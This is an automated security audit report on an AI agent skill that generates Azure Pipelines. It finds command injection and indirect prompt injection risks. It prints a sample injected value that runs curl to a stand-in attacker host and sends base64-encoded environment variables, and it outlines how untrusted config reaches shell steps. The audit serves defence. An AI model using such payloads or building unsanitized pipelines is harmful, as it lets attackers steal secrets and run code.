generate-azure-pipelines

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGH
Findings: COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): The skill generates shell scripts by interpolating unsanitized template variables directly into command strings. Specifically, in templates/build-job-template.yml and templates/ci-pipeline-template.yml, variables like {{INSTALL_COMMAND}}, {{BUILD_TOOL}}, and {{TEST_PATH}} are used inside - script: blocks. An attacker providing a value such as ; curl http://attacker.com/$(env | base64) for any of these fields would trigger unauthorized code execution.
  • [PROMPT_INJECTION] (HIGH): The skill is susceptible to Indirect Prompt Injection (Category 8). It ingests untrusted configuration data to populate templates that have high-privilege capabilities.
      ◦ Ingestion points: Variables provided via the pipeline configuration (e.g., APP_URL, INSTALL_COMMAND, VERSION).
      ◦ Boundary markers: Absent. Values are placed directly into shell commands and YAML structures.
      ◦ Capability inventory: The generated pipelines have the ability to execute shell commands, access Azure Service Connections (azureSubscription), and perform deployments/modifications in Azure environments.
      ◦ Sanitization: While scripts/pipeline_generator.py contains some basic sanitization for artifact_name and resource_prefix, it lacks any escaping or validation for the high-risk variables used in script execution blocks.
  • [CREDENTIALS_UNSAFE] (LOW): The templates correctly use Azure Pipelines variable syntax (e.g., $(registryPassword), $(staticWebAppToken)), which is standard practice for secret management in CI/CD; however, the command injection vulnerability would allow an attacker to easily exfiltrate these secrets at runtime.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 08:44 AM